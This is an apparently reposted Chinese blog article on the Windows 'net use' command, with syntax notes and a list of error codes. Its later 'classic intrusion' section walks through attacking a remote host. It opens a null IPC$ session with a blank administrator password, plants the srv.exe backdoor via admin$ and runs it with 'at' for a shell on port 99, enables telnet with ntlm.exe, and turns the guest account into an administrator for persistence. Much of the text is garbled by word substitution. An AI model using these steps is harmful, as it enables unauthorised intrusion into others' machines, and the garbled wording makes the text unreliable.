其他盘类推) 如果已经和目标建立了ipc$
一 使用示例
检索网络连接列表
辅佐
创建网络映像
成立空连接:
成立非空连接
本机的共享;
成立非空连接
删除共享映射
看下图,删除后客户端连接为0;
检察长途主机的共享资源
检察本田主机的共享资源
得到长途主机的用户名列表
得到本田主机的用户列表
显示本田主机当前处事
映射长途共享
二 net use 命令
用于将计算机与共享的资源相连接(成立磁盘映射),或者堵截计算机与共享资源的连接(删除磁盘映射),当不带选项使用本命令时,它会列出计算机的连接。
中文名 NET USE 外文名 NET USE 指令环境 Windows
目录
1 说明
2 语法
3 错误列表
说明
用于将计算机与共享的资源相连接(成立磁盘映射),或者堵截计算机与共享资源的连接(删除磁盘映射),当不带选项使用本命令时,它会列出计算机的连接。
语法
NET USE
[devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username]
[/USER:[dotted domain name\]username]
[/USER:[[email protected] domain name]
[/SMARTCARD]
[/SAVECRED]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]
NET USE {devicename | *} [password | *] /HOME
NET USE [/PERSISTENT:{YES | NO}]
注意:各参数之间有空格,如
net use \\computername /user
↑ ↑ 空格
参数说明
例子devicename 指定一个名字以便与资源相连接,或者指定要堵截的设备。
有两种类型的设备名:磁盘驱动器 (D: 至 Z:) 和打印机
(LPT1: 至 LPT3:)。输入 一个星号来取代一个指定的设备名可以分配下一个可用设备名。
\\computername 指控制共享资源的计算机的名字。如果计算机名中包罗有空字符,就要将双反斜线 (\\) 和计算机名一起用引号(" ")括起来。计算机名可以有1 到 15 个 字符。
\sharename 指共享资源的网络名字。
\volume 指定一个处事器上的 NetWare 卷。用户必需安置 Netware的客户处事(Windows 事情站) 或者 Netware 的网关处事(Windows 处事器) 并使之与 NetWare 处事器相连。
password 指访谒共享资源所需要的暗码。* 进行暗码提示。当在暗码提示符下输入暗码时,暗码不会显示。
/USER 指定连接时的一个差此外用户名。
domainname 指定此外一个域。如果缺省域,就会使用当前登录的域。
username 指定登录的用户名。
/SMARTCARD 指定连接使用在智能卡上的根据。
/SAVECRED 指定保存用户名和暗码。此开关被忽略,除横死令提示输入用户名和暗码。
/HOME 将用户与他们的主目录相连。
/DELETE 打消一个网络连接,并且从永久连接列表中删除该连接。
/PERSISTENT 控制对永久网络连接的使用。其默认值是比来使用的设置。
YES 在连接孕育产生时生存它们,并不才次登录时恢复它们。
NO 不生存正在孕育产生的连接或后续的连接;现有的连接将不才次登录时恢复。可以使用 /DELETE 选项开关来删除永久连接。
成立磁盘映射↓
列如:net use J: \\MOVIE01\movie06$ 成立磁盘映射
net use i: \\movie\movie3$ "2009" /user:"2009" 用用户名登陆磁盘映射
删除磁盘映射↓
列如:net use i: /del
错误列表
System Errors
系统错误种类
System error 5 - Access is denied
系统错误5 -拒绝访谒
System error 5 because of firewall
系统错误五,因为防火墙
System error 5 when using net view command in Vista
系统错误5 在Vista使用net view
System error 8 - Not enough storage is available to process this command
系统错误8 -没有足够的存储是可用来措置惩罚惩罚此命令
System error 21 has occurred - The device is not ready.
系统错误21日产生了-该装置没有筹备好。
System error 51 has occurred - The remote computer is not available
系统错误51已经产生-长途计算机不成达到
System error 52 - You were not connected because a duplicate name exists on the network.
系统错误52 -本机在网络中重名。
System error 53 - The network path was not found
系统错误53 -网络路径没有被发明
System error 59 has occurred.
系统错误59已经产生。 An unexpected network error occurred 意想不到的网络产生错误
System error 64 - "The specified network name is no longer available"
系统错误64 -"指定网络名称不再可用"
System error 67 - The network name cannot be found
系统错误67 -网络名称不能找到
System Error 71 - The network request was not accepted
系统错误71 -网络的要求不被接受
system error 71 has occurred - Post
系统错误71已经产生-送出
System error 85 has occurred. The local device name is already in use
系统错误85已经产生。本地设备名是已在使用中
System error 85 has occurred - Case Study
系统错误85已经产生-案例研究
System error 234 - More data is available
System Error 1130 - "Not enough server storage is available to process this command" and “Not enough memory to complete transaction. Close some applications and retry"
系统错误1130 -"没有足够的处事器存储,是可用来措置惩罚惩罚此命令" " 没有足够的内存,以完成措置惩罚惩罚。 封锁一些应用措施和再审"
System error 1219 has occurred - The credentials supplied conflict with an existing set of credentials
系统错误1219已经产生 - 全权证书提供的斗嘴与现有的全权证书
System error 1219 - Multiple connections to a server
系统错误1219 - 多重连接到一台处事器
System error 1231 has occurred. The network location cannot be reached.
系统错误1231已经产生 - 网络定位不能达成共鸣。
System error 1231 - There are no entries on the list
系统错误123已经产生 - 没有任何entries名单
System Error 1240 - The account is not authorized to login from this station.
系统错误1240 - 该帐户是没有获得授权登录从这个站点。
System error 1311 - There are currently no logon servers available to service the logon request
系统错误1311 - 目前没有登入伺服器供给处事登录请求
System error 1312 has occurred - - A specified logon session does not exist. It may already have been terminated.
系统错误, 1312已经产生 - - 指定帐号会议是不存在的。 它可能已经被终止。
System Error 1314 – A required privilege is not held by the client
系统错误第1314 - 要求特权,是不是举行,由客户端
System error 1326 has occurred - Logon failure: unknown user name or bad password
系统错误, 1326已经产生 -登录掉败:未知的用户名或暗码
System error 1326 - Logon failure: unknown user name
系统错误1326 -登录掉败:未知的用户名
System error 1326 has occurred when using net use in Vista
系统错误1326产生-Vista系统中在使用网络应用
System error 1331 has occurred - Logon failure: account current disable
系统错误第1331产生了-登入掉败:帐户目前停用
System error 1385 has occurred - Logon failure: the user has not been granted the requested logon type at this computer
系统错误第1385产生了-登入掉败:使用者未获批准,被请求登入类型,在这台电脑
System error 1396 has occurred - Logon Failure: The target account name is incorrect.
系统错误, 1396已经产生 -登入掉败:方针帐户名称是不正确。
System error 6118 - The list of servers for this workgroup is not currently available
系统错误6118 -名单上的处事器,这个事情目前还没有可供
System error 1726 has occurred. The remote procedure call failed.
系统错误, 1726已经产生。 长途过程挪用掉败了。
========
三 net use命令详解
1)成立空连接:
net use \\IP\ipc$ "" /user:"" (必然要注意:这一行命令中包罗了3个空格)
2)成立非空连接:
net use \\IP\ipc$ "暗码" /user:"用户名" (同样有3个空格)
3)映射默认共享:
net use z: \\IP\c$ "暗码" /user:"用户名" (即可将对方的c盘映射为本身的z盘,其他盘类推)
如果已经和方针成立了ipc$,则可以直接用IP+盘符+$访谒,具体命令 net use z: \\IP\c$
4)删除一个ipc$连接
net use \\IP\ipc$ /del
5)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
3 检察长途主机的共享资源(但看不到默认共享)
net view \\IP
4 检察本田主机的共享资源(可以看到本地的默认共享)
net share
5 得到长途主机的用户名列表
nbtstat -A IP
6 得到本田主机的用户列表
net user
7 检察长途主机确当前时间
net time \\IP
8 显示本田主机当前处事
net start
9 启动/封锁本地处事
net start 处事名 /y
net stop 处事名 /y
10 映射长途共享:
net use z: \\IP\baby
此命令将共享名为baby的共享资源映射到z盘
11 删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del /y删除全部
12 向长途主机复制文件
copy \路径\srv.exe \\IP\共享目录名,如:
copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内
13 长途添加打算任务
at \\ip 时间 措施名,如:
at \\127.0.0.0 11:00 love.exe
注意:时间尽量使用24小时制;在系统默认搜索路径(好比system32/)下不用加路径,否则必需加全路径
14 开启长途主机的telnet
这里要用到一个小措施:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求:
1)方针开启了ipc$共享
2)你要拥有打点员暗码和帐号
3)方针开启RemoteRegistry处事,用户就该ntlm认证
4)对WIN2K/XP有效,NT未经测试
命令格局:OpenTelnet.exe \\server account psw NTLM认证方法 port
试例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90
15 激活用户/插手打点员组
1 net uesr account /active:yes
2 net localgroup administrators account /add
16 封锁长途主机的telnet
同样需要一个小措施:ResumeTelnet.exe
命令格局:ResumeTelnet.exe \\server account psw
试例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator ""
17 删除一个已成立的ipc$连接
net use \\IP\ipc$ /del
九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢感动原创作者!(不知道是哪位前辈)
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,暗码为"空"的IP地点(空口令?哇,运气好到家了),如果是筹算打击的话,就可以用这样的命令来与127.0.0.1成立一个连接,因为暗码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可告成完成。
复制之前务必用net view \\IP这个命令看一下对方的共享情况
2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么处所去了)。
3. C:\>net time \\127.0.0.1
查查时间,发明127.0.0.1 确当前时间是 2002/3/19 上午 11:00,命令告成完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 确当前时间是 2002/3/19 上午 11:05,那就筹备开始下面的命令。
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们成立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们筹算成立一个Telnet处事!这就要用到ntlm了
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个措施在对方计算机上运行)。当呈现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet处事!
9. Telnet 127.0.0.1,接着输入用户名与暗码就进入对方了,操纵就像在DOS上操纵一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到打点组
10. C:\>net user guest /active:yes
将对方的Guest用户激活
11. C:\>net user guest 1234
将Guest的暗码改为1234,或者你要设定的暗码
12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果打点员暗码变动,guest帐号没转变的话,下次我们可以用guest再次访谒这台计算机)
此外,你也可以按照返回的错误号分析原因:
错误号5,拒绝访谒:很可能你使用的用户不是打点员权限的,先提升权限;
错误号51,Windows无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip地点错误;方针未开机;方针lanmanserver处事未启动;方针有防火墙(端口过滤);
错误号67,找不到网络名:你的lanmanworkstation处事未启动或者方针删除了ipc$;
错误号1219,供给的根据与已存在的根据集斗嘴:你已经和对方成立了一个ipc$,请删除再连;
错误号1326,未知的用户名或错误暗码:原因很明显了;
错误号1792,试图登录,但是网络登录处事没有启动:方针NetLogon处事未启动;
错误号2242,此用户的暗码已颠末期:方针有帐号计谋,强制按期要求变动暗码
在使用这种要领屏蔽网络映射成果时,只需要先打开系统的运行对话框,并在此中执行“cmd”字符串命令,将系统界面切换到MS-DOS命令行状态;接着在DOS提示符下执行“net use x:/del”字符串命令,就能将网络磁盘分区为“X”的网络映射连接断开了,要想快速地将本地计算机中所有的网络映射连接断开的话,,只需要执行“net use * /del”字符串命令就可以了。
————————————————
图解net use 命令使用示例
温馨提示: 本文由Jm博客推荐,转载请保留链接: https://www.jmwww.net/file/web/29931.html